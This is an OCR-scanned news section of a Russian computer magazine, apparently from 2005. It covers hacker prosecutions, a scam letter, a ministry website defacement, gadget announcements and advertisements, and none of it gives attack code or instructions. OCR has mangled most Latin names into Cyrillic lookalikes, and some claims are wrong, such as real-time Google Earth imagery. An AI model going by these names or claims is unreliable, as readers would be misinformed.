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ІЫТРО: 

О чем ты подумал, когда взял в руки этот сентябрьский но- 
мер журнала? Наверное, ты подумал о том, сколько хитрых 
взломо-кодинговых идей ты сможешь оттуда почерпнуть, как 
расслабишься креативом, а затем, с новыми силами, погру- 
зишься в недры Юниксоида? :) А вот у меня сентябрь ассоци- 
ируется почему-то со школой. Первый раз — в первый класс, 
первый раз — в пятый класс, первый раз — в институт.. .инте- 
ресные были ощущения. А еще сентябрь хорош тем, что лето 
еще формально не кончилось и настроение все еще весьма 
гут, поэтому в учебу приходится входить долго и тягостно. Но 
это ничего, ведь, как говорится, учиться никогда не поздно :). 
В общем, срочно заканчивай читать мой полночный бред и 
приступай к журналу. Начни со «Взлома». 

Александр Лозовский , выпускающий редактор 
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КРОССОВКИ 
ЗА ВЗЛОМ 




В США арестовали семнадцати летнего хакера по имени Жасмин Синх. Па- 
рень попался за распространение червячка, берущего под контроль компь- 
ютеры тысяч юзеров и использующего их для атаки на определенные сай- 
ты. Подобное уже давно стало банальностью и происходит везде, от Кер- 
чи до Индокитая. Интересно то, что за проведение БоЗ-атаки на интернет- 
магазины иегзеу-иое.сот и Оізіапі Неріауз, торгующие спортивным барах- 
лом, нашему герою пообещали в награду... три пары кроссовок и крутые 
часы. Хакер оказался не самой высокой квалификации. И, хоть и выпол- 
нил заказ, но наследил везде, где только можно. В том числе засветил 
свой рабочий почтовый ящик, через который на него и вышли федералы. 
Когда юнца с цветочным именем стали расспрашивать в отделении, мол- 
чать он не стал, и быстро выдал имя своего заказчика. Оказался им прия- 
тель Синха — 1 8-летний Джейсон Арабо, занимающийся продажей спор- 
тивной одежды, и решивший с помощью хакера устранить конкурентов. 
Недавно над Жасмином состоялся суд, на котором ему припаяли 5 лет 
тюрьмы и 35 тысяч долларов — их предстоит выплатить пострадавшим 
компаниям. Можно сказать, парню повезло, так как суд был решитель- 
но настроен припаять парню 20 лет тюрьмы. 



ВОЙНА ВИРУСОВ 



РАСКАЯНИЕ 
СОТРУДНИКА АОІ. 

В прошлом месяце сос- 
тоялся суд по делу быв- 
шего сотрудника ком- 
пании Атегіса Опііпе 
Джейсона Смэтерса. 
В 2004 г. этот 25-лет- 
ний программист был 
уволен за какие-то нез- 
начительные прегре- 
шения, но так просто 
уходить парень не со- 
бирался. Договорив- 
шись с владельцем оффшорного игрового сайта из Лас-Вегаса, Джей- 
сон воспользовался аккаунтом своего бывшего коллеги из АОІ_ и, про- 
никнув в систему, скачал базу данных о всех пользователях провайде- 
ра. Всего 92 миллиона персональных данных, включая емейлы и имена. 
Смэтерса довольно быстро нашли, и в течение года шло судебное раз- 
бирательство, которое закончилось, как я уже сказал, месяц назад. Все 
это время воришка не отрицал своей вины, а на суде даже раскаялся и 
извинился перед пострадавшими. Но поезд уже ушел, а проданная за 30 
тысяч баксов база данных была использована для рассылки 7 миллиар- 
дов спаммерских писем. Судья приговорил Джэйсона Смэтерса к 15 ме- 
сяцам тюрьмы. 



СООСІ.Е ГРОЗИТ 
НАКРЫТЬ СЕТЬЮ 
ВЕСЬ МИР 

В сети появилась информация о том, что компания Ооодіе намере- 
вается построить в США широкополосную сеть с бесплатным выхо- 
дом в инет. Оказалось, что Ооодіе уже давно скупает неиспользуе- 
мые участки с проложенным в них оптоволокном, а также приобре- 
ла быстрые каналы, связывающие крупные американские города. 
Ни один провайдер в истории еще не проводил столь масштабную 




Компьютерной заразы в Сети раз- 
велось уже столько, что на всех не 
хватает компов. Поэтому в послед- 
нее время в компьютерном мире 
наблюдается интересное явле- 
ние — война вирусов. Вирусмей- 
керы нынче не желают делить 
жертв со своими коллегами, и 
встраивают в свои творения анти- 
вирусные функции, которые уда- 
ляют чужие вири с зараженного 
компьютера. Примером тому мо- 
жет стать недавняя эпидемия виря 
2о1оЬ, который навел шороху среди крупных компаний, таких как изда- 
тельский дом РіпапсіаІ Тітез, телеканалы АВС и СІЧІЧ, машинострои- 
тельная компаная СаІегріІІаг. Вскоре после этого вируса, вышла зверуш- 
ка от другого автора — Вогогі. Этот вирус тоже распространяется в сис- 
темах ѴѴіпбоѵѵз 2000, используя ту же дырку, но при попадании на уяз- 
вимый компьютер, стирает 2о1оЬ и занимает его место. Зесигііу-анали- 
тики обеспокоены этим явлением, и имеют мрачное предчувствие, что 
ничем хорошим это не закончится. А МісгозоК призывает регулярно об- 
новлять антивирусы и не забывать качать патчи. 



акцию по подключению юзеров, и, учитывая то, что ОоодІеІМеІ будет 
бесплатной для всех, многим коммерческим ІЗР'ам США грозит банк- 
ротство. Если, конечно, гуглу удастся воплотить проект в жизнь. Ведь 
денег на это придется вбухать немало, но авторы популярнейшего поис- 
ковика намерены отбить их рекламой. К тому же, имея собственные ка- 
налы, можно будет сильно сэкономить на трафике после введения сете- 
вых мультимедийных 
сервисов. 

Что выиграет от этих 
грандиозных планов 
простой юзер? Бесп- 
латный быстрый ин- 
тернет — это, конечно, 
здорово, особенно для 
русских студентов. Но, 
если Ооодіе станет ми- 
ровым монополистом в 
области сетевых услуг, 
никто не знает, к чему 
это приведет. Монопо- 
лия никогда до добра 
не доводила. 






НАВОЫЕѴѴ5 



НАВРЫЕѴѴЗ 



СПЕАТІѴЕ Х-РІ 
ПОЧТИ ЗДЕСЬ 



8АМ8ІІИС 
ПРОЖЖЕТ ВСЕ 



Возрадуйся, меломан! Компания 
Сгеаііѵе, которая выпускает массу 
плееров, колонок и прочей аудио- 
продукции, включая всем извест- 
ные звуковые бластеры, выпуска- 
ет плату ЗоипсІ Віазіег на новом 
звуковом чипе Сгеаііѵе Х-Рі, кото- 
рая выйдет уже осенью! Она обла- 
дает такими выдающимися харак- 
теристиками, как соотношение 
сигнал-шум 116 дБ, 51,1 миллиона 
транзисторов и 4096 аудиоканалов. Кроме этого поддерживается новая 
версия технологии ЗЭ-звучания ЕАХ, виртуальный объемный звук (это 
когда двухканальная композиция проигрывается на многоканальной 
системе, звуча так, словно она действительно объемная), запись 24-раз- 
рядного звука с частотой до 96 кГ ц, применяя АЗІО 2.0. Поставляться на 
рынок будет четыре разных варианта платы, которые будут различать- 
ся своей комплектацией, техническими характеристиками и, соответ- 
ственно, ценой. 




Если ты все еще не можешь определиться, каким 
форматом ЭѴЭ пользоваться, отдать предпочте- 
ние «+» или «-», то новинка от компании Затзипд 
спасет тебя. Это внешний Э\Ю-привод Затзипд 
ѴѴгіІеМазІег ЗЕ-ѴѴ164С, который знает все диски. 
Он записывает ОѴЭ+/-В на скорости до 16х, 
ЭѴЭ+ВѴѴ — 8х и ЭѴЭ-ВѴѴ — 6х, а поддержка 
двухслойных ОѴЭ-дисков обоих стандартов 
(ОѴЭ+/-В) позволит тебе хранить до 8,5 Гбайт дан- 
ных на одном диске. Максимальная скорость записи ЭѴЭ+В 01 . — 5-кратная, 
а ЭѴЭ-В 01 . — 4-кратная. Для улучшения качества работы и записи исполь- 
зуется масса фирменных технологий. Это ЗАТ (Зрееб Афизіітіепі 
ТесИпоІоду, автоопределение скорости в зависимости от качества диска), 
ТАС (надежная запись путем изменения направления луча), ЭоиЫе ОРС 
(Орйтит Роѵѵег Сопігоі, контроль уровня мощности лазера по внешней и 
внутренней сторонам диска), технология защиты буфера от опустошения 
(ВиТСег ІІпбег Вип Ргее ТесИпоІоду обеспечивает стабильную запись на высо- 
кой скорости), а Мадіс Зрееб и АВЗ (Аиіотайс ВаІІ Ваіапсіпд Зузіет) снижа- 
ют уровень шума и вибрации. 
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г КАБИНУ ЭКИПАЖА 
§ ВОЕІИС 787 ОСНАСТЯТ 
І ИННОВАЦИОННЫМ 
1 ОБОРУДОВАНИЕМ 




Компания Воеіпд представила миру кабину экипажа своего новейшего 
лайнера Воеіпд 787 ОгеатЫпег, в кабине которого располагаются 5 мо- 
ниторов значительно большего размера, чем используемые ранее — 
30,5 см х 23,1 см. Одно из главных нововведений — двойные индикато- 
ры на лобовом стекле и комплект летной документации в электронном 
формате. Индикатор позволяет пилоту видеть всю необходимую ин- 
формацию прямо на стекле авиалайнера на уровне глаз и не отвле- 
каться от процесса пилотажа. В комплект летной информации входят 
карты, руководства, схемы и прочая информация, например такая, как 
электронные карты аэропортов, что позволяет повысить безопасность 
при управлении самолетом. Кроме того, в кабине установлен индика- 
тор обстановки в вертикальном пространстве, что позволяет пилотам 
видеть контур земной поверхности перед авиалайнером. Что самое ин- 
тересное, кабина экипажа Воеіпд 787 практически не отличается от ка- 
бины Воеіпд 777 — это позволит авиакомпаниям не тратить время и 
средства на переподготовку членов экипажа. 
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ХОМЯК-БАТАРЕЙКА 

Питер Эш — шестнадцатилетний 
британский подросток из Лоуфор- 
да — изобрел весьма интересный 
способ заряжать аккумуляторы 
мобильного телефона при помощи 
своего домашнего животного — 
хомяка по кличке Элвис. 

Бегая в своем колесе, хомячок 
заряжает мобильный Питера. 
Все дело в том, что Элвис — ве- 
ликий непоседа и способен часа- 
ми бегать внутри своего колеса. 
Причем делать это хомяк боль- 
ше всего любит ночью. Это 
очень мешало Саре, сестре Пи- 
тера, и она постоянно жалова- 
лась на поведение Элвиса. 
Именно после постоянных жалоб 
Сары Питеру пришло в голову 
получать выгоду из затрачивае- 
мой впустую энергии своего питомца. Он подключил к колесу элект- 
рогенератор, связанный с зарядным устройством для мобильного 
телефона. При этом две минуты бега хомяка по колесу позволяют 
подзарядить аккумуляторы на полчаса разговоров. Такой экзоти- 
ческий зарядник, который не причиняет вреда окружающей среде, 
Питер Эш представил в качестве части своего научного проекта 
для получения сертификата о среднем образовании ОС5Е (ѲепегаІ 
СегШісаІе оі Зесопбагу Ебисаііоп). 




КШС5ТОЫ ВСПЫХНУЛ 




Наверное, любой пользователь знает эту компанию и те модули опе- 
ративной памяти, которые она выпускает. Но номенклатура ее изде- 
лий этим не ограничивается, Кіпдзіоп выпускает еще и флеш-драйвы 
семейства ЭаІаТгаѵеІег. Эта линейка недавно пополнилась устрой- 
ством Эаіа Тгаѵеіег II РІиз Мідо ЕсШіоп. Это компактное устройство ос- 
нащено интерфейсом 115В 2.0, имеет строгий дизайн и небольшие раз- 
меры (67,7x20,8x9 мм). Объем памяти варьируется от 256 Мб до 2 Гб, 
работать с ним можно при температуре от 0 до 60 градусов, сохран- 
ность данных гарантируется в течение 10 лет. Вторая часть названия 
(Мідо ЕсІШоп) несет в себе глубокий смысл. В комплект поставки 
флешки входят утилиты РоѵѵегНоизе Мідо, которые позволяют сохра- 
нять на Эаіа Тгаѵеіег электронные письма, настройки браузера и мно- 
гое другое. Если ты доверяешь бренду Кіпдзіоп, все ОЗУ в твоем 
компьютере именно этой марки, то, наверное, ты не откажешься и от 
флешки этой компании. 



УНИВЕРСАЛЬНЫЙ 
ПРИВОД А51І5 

Что делать рядовому пользователю, когда различные компании ста- 
раются продвинуть свой формат ЭѴЭ? Не пользоваться такими дис- 
ками, пока компьютерные гиганты не придут к согласию? Нет! Лучше 
приобрести универсальный привод, работающий со всеми формата- 
ми дисков. Например, такой, как А81І8 ЭВѴѴ-1608Р2, поддерживаю- 
щий запись на двухслойные диски ЭѴЭ-І-/-В со скоростью 8Х и на 
диски ЭѴО-і-/- со скоростью 16Х. Он также поддерживает следующие 
форматы: ЭѴЭ-ВАМ со скоростью 2Х геаб, ЭѴЭ-ВеѵѵгіІе — 6Х, 
ЭѴЭ+Веѵѵте — 8Х, ЭѴЭ-ВОМ — 16Х, СЭ-ѴѴгііе — 40Х, СЭ-Веѵѵгііе — 
32Х и СЭ-ВОМ — 40Х. 

В этом приводе, имеющем традиционный для таких устройств внеш- 
ний вид, применяются следующие фирменные технологии А81І8. 
Система РІехІгаЫпк предотвращает ошибки, связанные с недозагруз- 
кой буфера, и исключает возможность порчи дисков, РІехІгаЗреесІ, 
которая непрерывно контролирует носители и устанавливает опти- 
мальные скорости записи, и система двойной динамической подвес- 
ки ЭЭЗЗ II, предназначенная для сведения к минимуму вибрации, вы- 
зываемой мотором оптического привода и резонансом между приво- 
дом и корпусом компьютера. 
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РОШЛО УСПЕШНО! 



ГАРНЬЕР ФРУКТИС ЭНЕРГИЯ ОБЪЁМА 

С АКТИВНЫМ КОНЦЕНТРАТОМ ФРУКТОВ 

Укрепляет волосы изнутри 
Восстанавливает поверхность волоса 
Создаёт впечатляющий объём, который держится долго 

Блеск и сила здоровых волос! 
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Долгое время операционка МасОЗ была достоянием только пользова- 
телей компьютеров Арріе. Но, судя по всему, очень скоро все изменит- 
ся, и мы с тобой сможем пощупать ось на своих писюках. Вообще, раз- 
работка РС-версии МасОЗ ведется с 2000 года — система будет пос- 
тавляться в 2006 г. для маломощных машин. Стив Джобс выдвинул 
требование, чтобы его система запускалась только на РС, при сборке 
которых использовалось железо Арріе. Для такого ограничения даже 
разработали специальный чип безопасности, предотвращающий копи- 
рование системы на обычные компы. Но хакеры успели отметиться и 
здесь. В Сети уже появилась инструкция, как обойти защиту от копи- 
рования — нужна сама МасОЗ X четвертой версии (Тідег), программа 
для создания виртуальных машин ѴМѵѵаге, РеагРС, эмулирующий ра- 
боту любых Мас-систем, программный пакет Арріе Оагѵѵіп 8.0.1, проц 
х86 с поддержкой ЗЗЕ2 и два кряка, которые можно найти в Сети. Най- 
ти описание процесса можно на сайте проекта 03x86. 

Пока Арріе не предприняла никаких действий против хакеров и сайтов, 
распространяющих инструкции по снятию защиты, но этого следует 
ожидать в ближайшем будущем. 



ВОССТАНИЕ 
ПРОТИВ МІСВ080РТ 

Місгозоіі мало, кто любит. Больши- 
нство людей ограничиваются мол- 
чаливой нелюбовью, но есть и та- 
кие, кто открыто выступает против 
конторы Билла. Особенно это ста- 
ло заметно, после активного про- 
никновения компании на новые 
рынки. Для борьбы с монополис- 
том был даже создан специальный 
комитет по борьбе с МісгозоЙ (ТПе 
СоттіИее іо РідІіі Місгозоф. В на- 
чале августа его глава Энди Мар- 
тин поделился с прессой своим на- 
мерением подать на М3 в суд, и та- 
ким образом остановить релиз 
ѴѴіпсІоѵѵз Ѵізіа. Борец с маздайным 
злом заявил, что продукты М3 — 
это один сплошной баг, а пользо- 
ватели играют роль подопытных 
кроликов. «Я не оставлю Місгозоіі 
л в покое до тех пор, пока она не 
о предоставит твердой гарантии, что ОС не содержит уязвимостей в бе- 
5 зопасности», — сказал Энди. А так как гарантий даже Швейцарский 
ф банк не дает, то мистеру Мартину предстоит еще долгая и упорная 

о. борьба. На выступления активиста известная компания ответила до- 

* вольно стандартно: «Мы делаем все возможное. Повышение зесигі- 
21 іу — наше приоритетное направление». 




ЬОСІТЕСН 
И ЕГО ЛАЗЕРЫ 




Если ты хоть раз видел комплект І_одііесИ ЭіЫоѵо, то наверняка он тебе 
запомнился. Еще бы — необычный стильный дизайн, дополнительный 
блок МебіаРасІ, ВІиеіооіП-концентратор, который совмещен с зарядной 
базой для беспроводной мыши. Сегодня компания представляет обнов- 
ленную версию этого комплекта (І_одііесІі сШМоѵо Мебіа Эезкіор І_азег), 
в которой нашли применения все последние разработки І_одііесІі. Серь- 
езно изменилась мышка — теперь это лазерное (І_одііесІі МХ1000 
СогсІІезз І_азег Моизе), а не оптическое устройство. Точность позицио- 
нирования у нее намного выше, чем у грызунов с оптическим датчиком. 
Беспроводной концентратор стал также более совершенным, теперь он 
поддерживает усовершенствованную технологию ВІиеіооіІі 2.0 
ЕпИапсесІ Оаіа Ваіе (ЕОВ), которая позволяет гораздо быстрее переда- 
вать информацию между устройствами ВІиеТооіІі. Продажи комплекта 
начнутся в октябре. Счастливчики из Европы покупают его по рекомен- 
дуемой цене за 200 долларов, сколько он будет стоить в России, пока 
сложно даже предположить. 



ЗАЩИТИ 
СВОЮ ЭНЕРГИЮ 

Всем жителям России известны проблемы с электричеством — то пере- 
пады напряжения, то вообще свет вдруг выключится. Как корабль в бур- 
ном море спасает маяк, так и в буре электрокатаклизмов нам поможет 
ИБП ЫдІііІіоизе. Все серии ИБП ЫдНіІіоизе (а их три: Вазе, Мазіег и Рго, 
различающиеся емкостью батарей ) оснащены защитой телефонной, 
факсовой, модемной, сетевой и Интернет линий, включая А08І_, для пре- 
дотвращения повреждения электронного оборудования, компенсации 
скачков напряжения и подавления шумов. С помощью простой и удобной 
русскоязычной утилиты пользователь сможет контролировать различ- 
ные параметры и управлять ИБП. Основными преимуществами своей 
продукции компания-производитель считает высокое качество комплек- 
тующих и сборки, адаптацию устройств для России и невысокую их цену. 
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АВТОПИЛОТИРУЕМЫИ 
ОРЕІ. ѴЕСТВА 




Компания ОепегаІ Моіогз разрабатывает эксклюзивную систему авто- 
пилотирования транспортными средствами, которая должна выйти в 
свет в начале 2008 года на легковом автомобиле ОреІ Ѵесіга. Автопи- 
лот можно будет использовать в условиях плотного движения на ско- 
ростях до 100 км/ч. Система получила название ТгаІІіс Аззізі и она смо- 
жет работать в полностью автоматическом режиме, не требуя каких- 
либо действий со стороны водителя. В комплект ТгаІІіс Аззізі входят 
лазерные датчики и видеокамеры, информация с которых поступает 
на бортовой компьютер и анализируется. Автопилот сможет распозна- 
вать дорожную разметку, препятствия на дороге и остальных участни- 
ков движения. В зависимости от ситуации на дороге, компьютер будет 
отдавать команды двигателю, приводу рулевого колеса или тормозной 
системе. По предварительным подсчетам, комплект оборудования 
ТгаІІіс Аззізі будет стоить дороже примерно в полтора раза, чем тради- 
ционные системы круиз-контроля, и вслед за ОреІ Ѵесіга должен поя- 
виться на автомобилях ЗааЬ 9-3, СасІіІІас ВІ_3 и Заіигп Аига. 



МАШИНА-ПРИЗРАК 
ОТ МЕЛКОМЯГКИХ 

Компания МісгозоК подала заявку в Управление США по патентам и 
торговым маркам (ІІЗРТО) на получение патента на новую систему 
навигации автомобиля. Сейчас, чтобы получить данные о загружен- 
ности дорог и для выбора оптимального маршрута движения, води- 
тель вынужден постоянно просматривать карту на бортовом компью- 
тере, либо прослушивать кучу информации в виде голосовых сооб- 
щений. Майкрософт же планирует облегчить навигацию и сделать ее 
более простой и удобной. 

Суть новой системы заключается в том, что на лобовом стекле автомо- 
биля будет изображена «машина-призрак», движущаяся как бы впере- 
ди к пункту назначения. Таким образом, водителю не обязательно бу- 
дет просматривать карту — достаточно будет просто двигаться за 
«призраком», который покажет оптимальный маршрут. Так же, за счет 
изменения цвета «машины-призрака», можно будет получать данные о 
погоде, состоянии дорог и прочее. В новой системе навигации, как ни 
странно, будет использоваться самый обычный метод — при помощи 
ОРЗ будут вычисляться координаты автомобиля и выбираться опти- 
мальный маршрут движения. 
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Удаляешь прыщи 
со своих фотографий 
в РНоЪозНор? 
Знакомая ситуация 
Начни пользоваться 

Оп 



РОК МЕІЧ 

Помоги 

своему лицу! 
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СООСІ.Е ЕАПТН 
НА ВООРУЖЕНИИ 
ТЕРРОРИСТОВ 

Если ты не в курсе, 

Ооодіе ЕаіІИ — это один 
из проектов Ооодіе, 
который позволяет те- 
бе в реальном време- 
ни наблюдать за по- 
верхностью Земли в 
любой ее точке. Прог- 
рамма-клиент после 
запуска соединяет по 
инету тебя со спутни- 
ком, дальше, вращая 
модель планеты, ты 
зумируешь изображе- 
ние в нужных тебе мес- 
тах и любуешься тем, 
что там творится. Мож- 
но запросто найти собственный дом, а так как детализация очень вы- 
сокая, даже рассмотреть припаркованную у подъезда машину. И все 
это обновляется в реальном времени! Проект не коммерческий, и кли- 
ент доступен для скачивания всем желающим — именно это и стало 
причиной волнений в правительственных кругах. Ведь с помощью 
Ооодіе ЕагІП можно посмотреть с высоты птичьего полета не только на 
экзотические курорты, но и на засекреченные объекты. При тестирова- 
нии программы, австралийские официальные лица со всеми подроб- 
ностями увидели изображение единственного в их стране атомного ре- 
актора, который мог бы стать лакомым куском для террористов. И это 
лишь один из объектов, которые не следует видеть простому глазу. По- 
ка требование подвергнуть цензуре Ооодіе ЕагІП появилось только у 
австралийских властей, но проект молодой, и есть все шансы, что к 
австралийцам присоединятся чиновники других стран. Большой Брат 
предпочитает сам наблюдать, и не любит, когда наблюдают за ним. 




10 МИЛЛИОНОВ ЗА 
НЕБОЛЬШУЮ УСЛУГУ 

Рунете захлестнула новая волна так называемых Нигерийских писем. На 
этот раз нам не рассказывают про наследство от африканской бабушки и 
не кормят байками о побеге из тюрьмы и нужде переправить деньги. С 
просьбой о помощи к нам обращается представитель Михаила Ходорко- 
вского. Да-да, того самого, у которого денег больше, чем у тебя, у меня и 
половины России вместе взятых. Так вот, оказывается у Миши в банке 
«МЕНАТЕП» хранится 450 миллионов припрятанных баксов. Но слишком 
долго они там лежат, и надо бы их переправить на другой счет. Только ку- 
да? У тебя ведь есть банковский счет, дружище? Ты-то нам и нужен! В об- 
щем, если ты не против, давай мы переведем тебе на счет 450 миллионов, 
а за хлопоты выделим 4% денег. То есть 10 миллионов... купишь себе че- 
го-нибудь сладенького. И вот еще что... чтобы переправить деньги, нужно 
знать твоей номер банковского счета и, конечно же, пароль к нему. Иначе 
никак. Ну и ясен пень, телефон свой скажи, а то вдруг ты жулик какой-то. 
После получения такого письма, корреспондент газеты «Известия» об- 
ратился в Бюро по борьбе с финансовыми преступлениями, но там ему 
объяснили, что раз финансовых потерь нет, значит, и суда нет. А прия- 
тель Ходорковского может где-то в Китае жить под вымышленным именем 
Чингисхан, как мы тебе его найдем? Пока власти играют в компьютерный 
покер на офисных пен- 
тиумах, письмо с за- 
манчивым предложе- 
нием уже обошло пол- 
рунета. Я не советую 
тебе помогать предс- 
тавителю Миши. Что- 
то мне подсказывает, 
что 10 миллионов за 
пустяковую услугу слиш- 
ком щедрый дар, даже 
для олигарха. 




ТРЕХМЕРНЫЙ ДИСП- 
ЛЕЙ ИЗ «ГИПЕРТКАНИ» 

Британец Адам Монтандон со своими коллегами из лаборатории НМС 
МесІіаІ_аЬ в Плимуте разработал довольно необычный трехмерный дисп- 
лей, в который можно в буквальном смысле слова окунуться с головой. 
Система состоит из экрана, инфракрасных сенсоров, проектора и видео- 
камеры. Экран изготовлен из так называемой гиперткани. Г иперткань — 
это эластичный материал, деформирующийся под внешним воздействи- 
ем. Сенсоры и видеокамера располагаются позади экрана и реагируют на 
изменения формы полотна из гиперткани, после чего передают данные в 
компьютер. Компьютер обрабатывает передан- 
ные данные с помощью специальной програм- 
мы и воспроизводит картинку на деформиро- 
ванном дисплее. Пока что эта система генери- 
рует объемное изображение леса. Человек мо- 
жет погрузить голову или руку в виртуальное 
пространство, либо «выбить» искры резким 
ударом по экрану. Полотно из гиперткани имеет 
размеры в один метр шириной и два метра вы- 
сотой. По мнению разработчиков, подобные 
стенды можно будет успешно применять на раз- 
личных выставках и презентациях. 




БИОМЕТРИЧЕСКИЕ 
КЛЮЧИ ОТ ДОМА 




В канадском городе Ванкувер скоро появится многоквартирный жилой 
дом класса люкс, в котором не будет обычных дверных замков. Новое 
здание будет оборудовано новейшей системой биометрической иденти- 
фикации жильцов и просто посетителей. Такая система — далеко не но- 
винка. Ранее она использовалась только в государственных, финансо- 
вых и закрытых учреждениях. Теперь же дом в Ванкувере первым из 
жилых сможет похвастаться своей высокотехнологической оснасткой. 
Биометрические сканеры будут установлены не только на дверях квар- 
тир, но и на уличной двери, в гараже, на стоянке и в лифтах. Изначаль- 
но со всех жильцов будут сняты отпечатки пальцев. Причем, во избежа- 
ние недоразумений, отпечатки будут сняты сразу с нескольких пальцев 
обеих рук. Процедура идентификации совершенно стандартная — это 
простое сканирование отпечатков при входе в здание. Продажа квартир 
в этом доме уже начата. Стоимость жилья варьируется от 500 тысяч до 
трех миллионов долларов. 










Мы предлагаем 
нашим клиентам 
только самое 
лучшее 




Компьютеры и серверы Х-Кіп§ 
с супертонкими мониторами 

ЗупсМазіег 7І0ІЧ, 720В, 720Т, 
920Т, І93Р, 1 73Р, 

обеспечивающими исключительное 
качество изображения 





5атзип§ $упсМа$(ег І73Р 
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8АРРНІВЕ ПОКОРЯЕТ 
СРЕДНИЙ СЕГМЕНТ 




Для вторжения в эту популярную ценовую область была подготов- 
лена новая серия видеоплат на основе чипсета АТІ Вабеоп 
Х80СКЗТ. Обе модели серии Х80СКЗТ базируются на успешной архи- 
тектуре Х800, имеют 256-битный интерфейс памяти, 8 пиксельных 
конвейеров, но оснащаются разным объемом видеопамяти и име- 
ют разные тактовые частоты. Первая модель ЗаррЫге ВАОЕОЫ 
Х80СКЗТ имеет 256 Мб ООВЗ-памяти, работает на частоте ядра 475 
МГц и имеет частоту памяти 980 МГц эффективная. Вторая модель 
серии оснащена 128 Мб 256-битной ОЭВІ -памяти в упаковке ВОА, 
частота ядра 475 МГц, частота памяти 700 МГц эффективная. В 
комплекте с обеими платами поставляется новая утилита для раз- 
гона ТВІХХ. К плате можно подключить два монитора (ОѴІ-І и ѴѲА), 
а также телевизор через 5-Ѵібео. В комплекте поставляются все 
необходимые переходники ОѴІ-І/ѴОА, 3-Ѵібео/композит и 3- 
Ѵібео/І-ЮТѴ и кабели. 



ПОИГРАЕМ В ВЕЫО 

А точнее в новый но- 
утбук этой компании, 
который называется 
ЗоуВоок 352. Родная 
фирма называет его 
основными достоин- 
ствами дизайн и 
функциональность. 

Он имеет 13-дюймо- 
вый широкоформат- 
ный дисплей с яр- 
костью 200 кд/м2 и 
встроенную систему 
объемного звучания, 
что вкупе дает поль- 
зователю возмож- 
ность наслаждаться 
ОѴО-фильмами. Для 
выхода в Сеть есть 
адаптер ѴѴі-Рі (а\Ь\д), который присутствует тут благодаря тому, что 
весь ноутбук построен на технологии Іпіеі Сепігіпо (чипсет 915ѲМ, час- 
тота шины данных 533 МГц). Еще о компонентах: в ЗоуВоок устанавли- 
вается мобильный процессор Репііит с тактовой частотой от 1,6 ГГц, 
256 или 512 Мб оперативной памяти, жесткий диск объемом до 80 Гб и 
оптический комбо-привод 0\Ю. Вес ноутбука составляет 2 кг (вместе с 
батареей), а в комплект поставки входит большой набор ПО, включаю- 
щий в себя фирменные утилиты ВепО и мультимедийное ПО сторонних 
производителей. 






Японские ученые в очередной раз удивили весь мир своим изобретением. 
Уж очень они любят наделять свои железные создания функциями, при- 
сущие живым существам. Уже есть и роботы-помощники, и роботы для 
пожилых людей, и роботы-футболисты, и роботы-переводчики. Недавно 
даже был прорыв — создание искуственной кожи, распознающей давле- 
ние и температуру — функции, характерные настоящей коже. На этот раз 
специалисты японской компании ЫТТ представили систему дистанцион- 
ного управления человеком. Принцип действия весьма прост — воздей- 
ствие на вестибюлярный аппарат, отвечающий за чувство равновесия. В 
область уха помещаются электроды, которые подают постоянный ток. За 
счет этого у человека меняется представление о собственном положении 
в пространстве и он идет туда, куда ему при помощи специального джойс- 
тика буквально указывают, куда идти. Фактически, японские ученые суме- 
ли превратить человека в радиоуправляемое устройство. 

На 5 1 0 О ВАР Н -2005 всем желающим была предоставлена возможность 
опробовать эту систему на себе и почувствовать себя немножко робо- 
том-андроидом. На данный момент разработчики видят широкое при- 
менение новинки в сфере видеоигр для более реалистичных ощущений 
в виртуальном пространстве. 




УМНАЯ ДВЕРЬ 

Японская корпорация Тапака создала автома- 
тическую дверь, подстраивающуюся под кон- 
туры тела проходящего сквозь нее человека. 
Дверь состоит из нескольких десятков тонких 
горизонтальных полос, раздвигающихся в 
разные стороны. При приближении к двери 
человека или иного живого существа много- 
численные инфракрасные датчики-сенсоры определяют его габари- 
ты, размеры сумок и прочие параметры, и с небольшим запасом разд- 
вигают полоски на нужное расстояние, либо же не раздвигают их во- 
обще. Как говорят сами разработчики, «умная» дверь будет препят- 
ствовать проникновению в помещение пыли, микробов и насекомых. 
Так- же дверь поможет снизить расходы на обогрев помещения вви- 
ду уменьшения интенсивности теплообмена комнаты с внешней сре- 
дой. Кстати, компания Тапака еще и разработала гаражные ворота, 
повторяющие контуры автомобиля. 
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СМЕРТЬ 
ВО ИМЯ ИГРЫ 

Новый случай смерти за компьютером зафиксирован в Южной Корее. 
После 50 часов игры в одном из интернет-кафе города Тэгу скончался 
28-летний геймер по имени Ли. В течение трех дней, которые он провел 
за монитором, чувак отрывался от него лишь на туалет и кратковремен- 
ный сон. Когда бывшие коллеги по работе (Ли уволился, чтобы было 
больше времени на игру), по просьбе матери, пришли вернуть его до- 
мой, геймер пообещал закончить свои внутриигровые дела и прийти. 
Но буквально час спустя откинул коньки. Вскрытие показало — больной 
умер от вскрытия... вернее от истощения и интенсивной нагрузки. Газе- 
ты, как всегда, развели из этого 
случая шумиху. Мол, на его месте 
можешь быть ты. Да ладно вам, 
товарищи газетчики, я и побольше 
засиживался, и ничего — здоров 
как огурчик. Может у Ли какая-то 
лихорадка случилась, или какой- 
нибудь злокачественный рак моз- 
га. Название игры, за которой по- 
мер пациент, неизвестно, но став- 
лю пятьсот рублей золотом — это 
ѴѴогІб оі ѴѴагсгаК. 



В ПИТЕРЕ 
ПРОШЕЛ СС05 




V 




МИНИСТЕРСТВО 
ОБОРОНЫ УКРАИНЫ 
ХАКНУЛИ 




Некоторое время назад, спецы из украинской зесигііу-компании 
«ІІкгаіпіап РНР Огоир» проанализировали защищенность сайта 
местного Министерства Обороны и пришли к выводу, что защищен- 
ность эта держится едва ли не на соплях. О чем известили админов 
военного ведомства. Но у Минобороны, видать, и так дел по горло, 
чтобы еще защищенностью компьютеров заниматься. Неудивитель- 
но, что сайт в итоге хакнули. Неизвестные хакеры отдефейсили ин- 
дексную страницу и оставили на ней сообщение в духе: «Гриценко, 
не спи». Министр обороны, товарищ Гриценко, от комментариев 
воздержался, зато комментарии дали независимые эксперты, кото- 
рые заявили, что из-за 501-уязвимости (именной ей воспользова- 
лись взломщики), военное ведомство могло полностью лишиться 
своей базы данных. К счастью, ничего такого не произошло. Но ин- 
цидент в очередной раз подтвердил, что вложить деньги в безопас- 
ность компьютерной системы выгоднее, чем потом оплачивать пос- 
ледствия ее взлома. 



"Ть. 



/ 

С 20 по 21 августа в славном городе Санкт-Петербург прошел оче- 
редной ежегодный фестиваль компьютерного искусства СИаоз 
Сопзігисііоп. Проводился он, как и в прошлом году, в здании тор- 
